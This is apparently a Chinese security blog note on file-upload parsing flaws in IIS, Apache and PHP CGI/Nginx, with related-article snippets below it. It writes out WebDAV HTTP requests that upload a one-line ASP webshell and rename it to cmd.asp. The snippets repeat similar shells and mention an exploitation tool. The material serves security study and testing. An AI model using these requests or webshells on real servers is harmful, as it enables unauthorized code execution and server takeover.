上传漏洞之解析漏洞(iis、apache、php cgi)

最新推荐文章于 2023-07-30 01:50:50 发布
最新推荐文章于 2023-07-30 01:50:50 发布
阅读量510 收藏
点赞数 1
分类专栏: 笔记 文章标签: php 安全 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/EC_Carrot/article/details/109653427
版权

解析漏洞

IIS解析漏洞

  1. IIS7/7.5在Fast-CGI运行模式下,在一个文件路径(/xx.jpg)后面加上/xx.php会将/xx.jpg/xx.php 解析为 php 文件。
  2. IIS6.0在解析文件时,存在解析漏洞,当建立*.asa和*.asp格式的文件夹是,其目录下任意文件都被当作asp文件来解析。
  3. 在IIS6.0中,当文件为*.asp;1.jpg时,同样会被当作asp文件解析,微软不认为这是漏洞,也没有推出它的补丁,所以该漏洞至今还存在。

基于IIS容器的WebDav漏洞
它扩展了HTTP协议,在原有的GET、POST、HEAD等几个HTTP标准方法以外还添加了PUT、Move、Copy、Delete等方法。

1.通过OPTIONS探测服务器所支持的HTTP方法

OPTIONS / HTTP/1.1
Host:www.xxx.com

2.通过PUT向服务器上传文件

PUT /a.txt HTTP/1.1
Host:www.xxx.com
Content-Length:30

<%eval request("aaa")%>

3.通过Move或Copy方法改名

COPY /a.txt HTTP/1.1
Host:www.xxx.com
Destination:http://www.xxx.com/cmd.asp

4.通过DELETE删除文件

DELETE /a.txt HTTP/1.1
Host:www.xxx.com

可以看到,通过这些HTTP方法不难获取一个WebShell

Apache解析漏洞

在Apache1.x和2.x版本中存在解析漏洞,但它们与IIS不同。
例:在URL中输入http://www.xxx.com/a.php.rar,a.php.rar被当做php文件去解析并正常运行了。
这是因为apache在解析文件是有一个原则,遇到不认识的扩展名时,会从后往前解析,直到碰到认识的扩展名为止,如果都不认识,则暴露源代码。
在apache的安装目录下,有个配置文件/conf/mime.types,该文件有详细的扩展名列表,从这里可以看到它认识什么扩展名!

PHP CGI解析漏洞

Nginx是一款高性能的Web服务器,通常用来作为PHP的解析容器,PHP CGI漏洞虽然与Nginx关系不是很大,但由于Nginx与PHP配合很容易造成这种解析漏洞,所以通常该漏洞常常被认为是Nginx的漏洞。
例:在URL中输入http://www.xxx.com/a.jpg/b.php
此时的b.php文件是不存在的,但a.jpg却被当PHP文件去解析了,问题就在b.php上(这个文件名不是固定的,可以随便命名)。意味着攻击者可以合法上传图片马,并在URL后加上/xxx.php,就可以获取WebShell。

小 白 萝 卜
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞挖掘】——29、XSS闯关游戏录(上)
Fly_鹏程万里
03-22 1986
alf.nu/alert1是一个XSS训练平台,集结了一些常见的XSS漏洞利用场景,总共有29道题目。
文件上传Apache解析漏洞和Mime检测绕过
一个普普通通的博客
03-24 1920
文件上传Apache解析漏洞和Mime检测绕过
CGI解析漏洞
keep06的博客
08-22 3424
CGI解析文件漏洞 文章目录CGI解析文件漏洞1.IIS 5.x~6.x中2.IIS 7.0~7.5 nginx8.0.3以下,nginx113.Apache解析漏洞4.**Nginx <0.8.03** **空字节代码执行漏洞** 1.IIS 5.x~6.x中 这几个版本中,.cer,.asa,.cdx文件是使用asp.dll解析的那么就可以绕过 木马: <%eval request("a")%> 我们可以尝试着上传一个后名为 lp.asp;.jpg文件,使用蚁剑连接;可以连接成功
Nginx CGI解析漏洞
weixin_66717977的博客
06-30 228
Nginx解析漏洞
封神台--CGI解析漏洞
weixin_47757121的博客
06-09 392
首先是进行图片马的制作 使用windows中的cmd :copy 1.jpg/b+.php tpyjh.jpg
IIS漏洞解析
10-15
### IIS漏洞解析 #### IIS 6.0 文件扩展名处理漏洞 IIS 6.0 是一款由微软发布的Internet Information Services (IIS)版本,在早期的Windows Server系统中广泛使用。此版本存在一个关于文件扩展名处理的安全漏洞...
Web应用安全IIS解析漏洞.pptx
06-19
**IIS解析漏洞详解** **一、什么是IIS** IIS(Internet Information Services)是由微软公司提供的一个Web服务组件,它包含了多种网络服务,如Web服务器、FTP服务器、NNTP服务器和SMTP服务器。这些服务主要用于...
IIS7.5解析错误命令执行漏洞解决方案.docx
10-26
**IIS7.5解析错误命令执行漏洞详解** IIS(Internet Information Services)7.5是一个流行的Web服务器软件,由微软公司开发。然而,它存在一个解析错误命令执行的漏洞,尤其是在使用FastCGI(Fast Common Gateway ...
渗透测试,文件上传漏洞笔记知识梳理图,适用于学习渗透测试初学者学习,仅供参考学习
06-02
例如,在IIS服务器中,可以利用分号绕过、目录解析漏洞CGI解析漏洞进行绕过;在Apache服务器中,可以利用.htaccess文件绕过或Apache的特定版本的解析漏洞。 **前端验证**的绕过手段包括抓包修改文件后缀、禁用...
PHP初学者头疼问题总结
04-16
这通常是因为web服务器(如IISApache)使用的不是当前正在编辑的`php.ini`文件。确保修改的是正确版本的配置文件,并且重启web服务器使更改生效。 #### 九、PHP在Windows Server 2003上的ISAPI模块安装问题 在...
php cgi漏洞利用工具 源代码
01-22
cgi mod(cve-2012-1823)最新漏洞,可以批量扫描多网段漏洞,多加利用,可以获取服务器控制权限。
apache的AllowOverride以及Options使用详解
01-10
AllowOverride参数就是指明Apache服务器是否去找.htacess文件作为配置文件,如果设置为none,那么服务器将忽略.htacess文件,如果设置为All,那么所有在.htaccess文件里有的指令都将被重写。对于AllowOverride,还可以对它指定如下一些能被重写的指令类型. 通常利用Apache的rewrite模块对 URL 进行重写的时候, rewrite规则会写在 .htaccess 文件里。但要使 apache 能够正常的读取.htaccess 文件的内容,就必须对.htaccess 所在目录进行配置。从安全性考虑,根目录的AllowOverride属性一般都
文件上传漏洞复现-Apache HTTPD 换行解析漏洞
最新发布
qq_52666132的博客
07-30 457
Apache HTTPD 换行解析漏洞(CVE-2017-15715)
【文件上传绕过】——解析漏洞_apache解析漏洞
weixin_45588247的博客
07-20 2283
文章目录一、实验目的:二、工具:三、实验环境:四、Apache 解析漏洞:1. 漏洞原理:2. 影响版本:3. 实验过程:3.1 模拟实验:3.2 upload-labs闯关游戏(Pass-04):五、其余配置问题导致的漏洞: 一、实验目的: 1、通过本次实验掌握apache解析漏洞原理。 2、通过upload-labs-master闯关游戏Pass-04,掌握apache解析漏洞技术。 二、工具: 火狐/谷歌浏览器 三、实验环境: 靶 机: windows10虚拟机:192.168.15.133
IIS6.0,Apache低版本,PHP CGI 解析漏洞
weixin_30954265的博客
07-28 388
IIS6.0解析漏洞IIS6.0下存在这样的文件“名字.asp;名字.jpg” 代表了jpg文件可以以asp脚本类型的文件执行。 根据这个解析漏洞我们可以上传这种名字类型的图片,比如 1.asp;xxx.jpg 他会忽略;后边的内容,所以文件相当于1.asp asp一句话木马 <%eval request ("pass")%> 找到上传的路径后,可以直接用菜刀连接。如果对文...
Iis7.0-7.5 fast-cgi解析漏洞
墨鱼菜鸡
09-10 237
Iis7.0-7.5 fast-cgi解析漏洞 Test.jpg/.php cgi.fix_pathinfo 打开winserver2008安装phpstudy切换版本为IIS+php5.2.17更改php.ini文件中的cgi.fix_pathinfo=1开启模块重启phpstudy在网站根目录下(phpstudy/www)新建文件<?ph...
【文件上传漏洞-07】中间件文件解析漏洞概述及实例——ApacheIIS和Nginx
m0_64378913的博客
07-12 3278
(1)第一种:未知扩展名解析漏洞 Apache对文件的解析主要是从右到左开始判断并进行解析,如果判断为不能解析的类型,则继续向左进行解析,如xx.php.wer.xxxxx将被解析PHP类型。(2)第二种:局部配置 通过htaccess文件进行局部配置,定义不同文件名及后缀的解析方式。参考《【文件上传漏洞-06】.htaccess攻击实验(基于upload-labs-4靶场)》(1)加深理解Apache的两种解析漏洞原理; (2)掌握两种解析漏洞的检测及绕过方法。靶场:基于WAMP环境的...
文件上传解析漏洞(三)—IIS6.0解析漏洞CGI解析漏洞、Upload-labs-master20-23Wirteup
weixin_41487522的博客
06-18 933
文件上传解析漏洞(三)—IIS6.0解析漏洞CGI解析漏洞、Upload-labs-master20-23Wirteup IIS6.0解析漏洞 IIS6.0解析漏洞,其实有一些不如说是IIS6.0的一些特性,严格意义上而言,只是一些默认配置并不是漏洞但是也有一些的确是漏洞IIS解析漏洞一: IIS6.0除了将ASP后缀当做ASP进行解析的同时,当文件后缀名字为.asa .cer .cdx也会当做asp去解析,这是因为IIS6.0在应用程序扩展中默认设置了.asa .cer .cdx都会调用
PHP中使用FastCGI解析漏洞及修复方案
romeoyue的专栏
01-09 2130
漏洞描述: Nginx默认是以CGI的方式支持PHP解析的,普遍的做法是在Nginx配置文件中通过正则匹配设置SCRIPT_FILENAME。当访问http://192.168.1.102/phpinfo.jpg/1.php这个URL时,$fastcgi_script_name会被设置为“phpinfo.jpg/1.php”,然后构造成SCRIPT_FILENAME传递给PHP CGI
IIS中间件漏洞详解:从解析漏洞到短文件漏洞
然而,IIS7.x在Fast-CGI模式下存在一个解析漏洞,即通过在非PHP文件后加上/.php,可以将该文件作为PHP文件执行。修复方案是在php.ini中设置cgi.fix_pathinfo为0并重启PHP-CGI服务。 此外,IIS的PUT任意文件写入漏洞...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值